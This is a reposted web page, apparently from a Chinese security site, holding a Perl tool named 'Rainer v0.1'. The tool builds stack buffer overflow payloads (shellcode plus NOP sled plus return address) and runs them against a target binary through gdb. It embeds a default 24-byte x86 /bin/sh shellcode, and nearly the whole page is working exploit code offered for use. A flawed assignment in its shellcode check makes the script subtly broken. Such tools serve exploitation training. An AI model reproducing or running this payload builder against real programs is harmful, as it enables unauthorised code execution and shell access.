Rainer v0.1 by localh0t
|
来源:mattdch0@gmail.com 作者:localh0t 发布时间:2011-08-30
|
|
#!/usr/local/bin/perl # Author: localh0t # Date: 18/06/11 # Contact: mattdch0@gmail.com # Follow: @mattdch # Help if(!$ARGV[2]) { print "\n\n###########################"; print "\n# Rainer v0.1 by localh0t #"; print "\n###########################"; print "\n\nUse: perl $0 -t [BINARY TARGET] -s [SHELLCODE (Optional)] -n [NOP's AMOUNT] -r [RETURN ADRESS] -m [RETURN METHOD (Optional)]\n"; print "Example: perl $0 -t ExploitMe -s \"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" -n 60 -r \"\\xb8\\xf3\\xff\\xbf\" -m Normal\n"; print "\nNote #1: If shellcode not defined, default to: 24 bytes /bin/sh shellcode.\n"; print "Note #2: If method not defined, normal method will be used.\n\n"; print "Methods:\n========\n"; print "Normal : shellcode + nops + ret + null\n"; print "NOPsled: nops + shellcode + ret + null\n\n"; exit(0); } # Default shellcode, 24 bytes /bin/sh $default = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; # Set all to -1 my ($bin, $shell, $na, $ret, $meth) = -1; # Giving values to variables foreach $loop (@ARGV) { for ($loop) { /^-t$/ and do { $bin = $ARGV[($arg+1)]; last; }; /^-s$/ and do { $shell = $ARGV[($arg+1)]; last; }; /^-n$/ and do { $na = $ARGV[($arg+1)]; last; }; /^-r$/ and do { $ret = $ARGV[($arg+1)]; last; }; /^-m$/ and do { $meth = $ARGV[($arg+1)]; last; }; } $arg++; } # If shellcode not present, default used if ($shell = -1) { $shell = $default; } # NOPs payload $nops = "\x90"x$na; # Functions sub normal{ my $bin = shift; my $shell = shift; my $nops = shift; my $ret = shift; $payload = 'gdb --eval-command="run" --args '.$bin.' $(printf "'.$shell.$nops.$ret.'\x00\x00\x00\x00")'; return $payload; } sub nopsled{ my $bin = shift; my $nops = shift; my $shell = shift; my $ret = shift; $payload = 'gdb --eval-command="run" --args '.$bin.' $(printf "'.$nops.$shell.$ret.'\x00\x00\x00\x00")'; return $payload; } # Main for ($meth) { /^Normal$/ and do { $payload = &normal($bin,$shell,$nops,$ret); last; }; /^NOPsled$/ and do { $payload = &nopsled($bin,$nops,$shell,$ret); last; }; -1 and do { $payload = &normal($bin,$shell,$nops,$ret); last; }; } exec($payload); __END__
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|